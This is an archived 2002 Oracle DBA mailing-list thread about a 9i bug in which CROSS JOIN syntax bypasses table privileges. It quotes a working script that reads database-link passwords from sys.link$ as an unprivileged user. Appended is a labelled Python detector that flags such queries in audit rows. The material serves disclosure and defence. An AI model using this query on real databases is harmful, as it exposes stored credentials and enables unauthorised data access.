
RE: Security Hole

From: Hately Mike <Mike.Hately_at_churchill.com>
Date: Tue, 16 Apr 2002 08:33:39 -0800
Message-ID: <F001.0044576A.20020416083339@fatcity.com>


Yeah, I got all of the emails in the wrong order so I saw the bug after I saw the replies. Consequently I made an idiot of myself.

Still, the sun's shining so it could be worse. =)

Regards (and apologies for wasting the electrons), Mike

-----Original Message-----
Sent: Tuesday, April 16, 2002 5:19 PM
To: Multiple recipients of list ORACLE-L

No, the user did not have access to link$. But that's the point. The bug allows the user access to a table he/she doesn't have access to when used with a cross join.

> -----Original Message-----
> From: Hately Mike [mailto:Mike.Hately_at_churchill.com]
> Sent: Tuesday, April 16, 2002 11:39 AM
> To: Multiple recipients of list ORACLE-L
> Subject: RE: Security Hole
>
>
> Glenn,
> did the user have access to LINK$? It's common practice to
> restrict access to that table.
>
> Cheers,
> Mike
>
> -----Original Message-----
> Sent: Tuesday, April 16, 2002 3:39 PM
> To: Multiple recipients of list ORACLE-L
>
>
> It appeared in 9i and is fixed in 9.2.
> 8i is not affected as it does not have cross joins.
>
> From Metalink Note 137286.1:
>
> Oracle9i introduces the following SQL:1999-compliant joins:
>
> 1.1 CROSS Join
> 1.2 NATURAL Join
> 1.3 OUTER Join
> 1.3.1 LEFT OUTER Join
> 1.3.2 RIGHT OUTER Join
> 1.3.3 FULL OUTER Join
>
>
> 1.1 CROSS Join
> --------------
>
> A CROSS join is the cross-product of two tables. It is the
> equivalent of a
> Cartesian product.
> -----------------------
>
> I tried the query with a cartesian product in 8i and it didn't work.
>
> select userid,password from sys.link$, dual
> *
> ERROR at line 1:
> ORA-00942: table or view does not exist
>
>
> > -----Original Message-----
> > From: Ruth Gramolini [mailto:rgramolini_at_tax.state.vt.us]
> > Sent: Tuesday, April 16, 2002 8:38 AM
> > To: Multiple recipients of list ORACLE-L
> > Subject: Re: Security Hole
> >
> >
> > Is this on 9i databases or is 8 involved? Ruth
> > ----- Original Message -----
> > To: "Multiple recipients of list ORACLE-L" <ORACLE-L_at_fatcity.com>
> > Sent: Tuesday, April 16, 2002 7:33 AM
> >
> >
> > > This just in from comp.databases.oracle.server.
> > >
> > > See metalink bug 2121935.
> > >
> > > Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc)
> > > allows you to view data from tables on which you have no
> > > privilege. For example, try this COMPLETE script:
> > >
> > > connect / as sysdba
> > > create user us1 identified by us1;
> > > grant create session to us1;
> > >
> > > connect us1/us1
> > >
> > > select userid, password
> > > from
> > > sys.link$ cross join dual
> > > ;
> > >
> > >
> > >
> > > Worse still, if you have the privilege to create views
> > > then this loophole allows you to seek and destroy
> > > ANY DATA in the database that you might want to.
> > >
> > > The bug is fixed in 9iR2. I didn't see any note
> > > about a backport, or a security alert on OTN.
> > >
> > > Conclusion:
> > >
> > > 9.0.1 should not be in use on production systems
> > > until Oracle supplies a fix.
> > >
> > >
> > >
> > > Jonathan Lewis
> > > http://www.jlcomp.demon.co.uk
> > >
> > > Author of:
> > > Practical Oracle 8i: Building Efficient Databases
> > >
> > > Next Seminar - Australia - July/August
> > > http://www.jlcomp.demon.co.uk/seminar.html
> > >
> > > Host to The Co-Operative Oracle Users' FAQ
> > > http://www.jlcomp.demon.co.uk/faq/ind_faq.html
> > >
> > >
> > >
> > >
> > > --
> > > Please see the official ORACLE-L FAQ: http://www.orafaq.com
> > > --
> > > Author: Jonathan Lewis
> > > INET: jonathan_at_jlcomp.demon.co.uk
> > >
> > > Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
> > > San Diego, California -- Public Internet access / Mailing Lists
> > > --------------------------------------------------------------------
> > > To REMOVE yourself from this mailing list, send an E-Mail message
> > > to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
> > > the message BODY, include a line containing: UNSUB ORACLE-L
> > > (or the name of mailing list you want to be removed from). You may
> > > also send the HELP command for other information (like subscribing).
> >
> > --
> > Author: Ruth Gramolini
> > INET: rgramolini_at_tax.state.vt.us
> >
> --
> Author: Glenn Travis
> INET: Glenn.Travis_at_sas.com
>
>
> --
> Author: Hately Mike
> INET: Mike.Hately_at_churchill.com
>

-- 
Author: Glenn Travis
  INET: Glenn.Travis_at_sas.com


 
-- 
Author: Hately Mike
  INET: Mike.Hately_at_churchill.com

Received on Tue Apr 16 2002 - 11:33:39 CDT
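An added detection example, not part of the thread or of Oracle's own tooling: a Python check a DBA could run over captured statements (audit-trail or V$SQL rows; the rows below are constructed samples) to flag the pattern the thread describes, SQL:1999 join syntax touching a SYS-owned object from a non-SYS session, plus a version test for the 9.0.x window the thread gives (appeared in 9i, fixed in 9.2, 8i unaffected). The row layout and function names are assumptions.

```python
"""Added detection helper (not from the thread): scan captured SQL text, e.g. rows
from the audit trail or V$SQL, for the pattern the thread describes: SQL:1999 join
syntax combined with a reference to a SYS-owned object from a non-SYS session."""
import re
from typing import Dict, List, Tuple

# Any JOIN keyword in a FROM clause is SQL:1999 syntax; Oracle's traditional
# syntax separates tables with commas and never uses the word JOIN.
ANSI_JOIN = re.compile(
    r"\b(?:(?:CROSS|NATURAL|INNER|LEFT|RIGHT|FULL)\s+(?:OUTER\s+)?)?JOIN\b", re.I)
# An explicitly qualified SYS-owned object such as sys.link$
SYS_OBJECT = re.compile(r"\bSYS\s*\.\s*([\w$#]+)", re.I)


def is_affected_version(version: str) -> bool:
    """True for 9.0.x: the thread reports the bug in 9i and the fix in 9.2,
    and 8i is unaffected because it has no ANSI joins."""
    major, minor = (int(p) for p in version.split(".")[:2])
    return major == 9 and minor < 2


def flag_ansi_join_on_sys(rows: List[Tuple[str, str]]) -> List[Dict]:
    """Return one finding per statement that a non-SYS user ran with an
    ANSI join touching a SYS.* object. rows = (username, sql_text)."""
    findings = []
    for user, sql in rows:
        if user.upper() == "SYS":
            continue
        join = ANSI_JOIN.search(sql)
        objects = SYS_OBJECT.findall(sql)
        if join and objects:
            findings.append({
                "user": user.upper(),
                "join": " ".join(join.group(0).split()).upper(),
                "objects": sorted(o.upper() for o in objects),
            })
    return findings


# Constructed sample rows (username, sql_text); not real audit data.
SAMPLE_AUDIT_ROWS = [
    ("US1", "select userid, password from sys.link$ cross join dual"),
    ("SYS", "select userid from sys.link$ cross join dual"),
    ("US1", "select userid, password from sys.link$, dual"),
    ("APP", "select e.ename from emp e left outer join dept d on e.deptno = d.deptno"),
    ("APP", "create view v_links as select * from sys.link$ left outer join dual on 1=1"),
]

if __name__ == "__main__":
    for finding in flag_ansi_join_on_sys(SAMPLE_AUDIT_ROWS):
        print(finding)
```

The third sample row uses the comma (traditional) syntax and is not flagged: per the thread that form is still privilege-checked and fails with ORA-00942.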
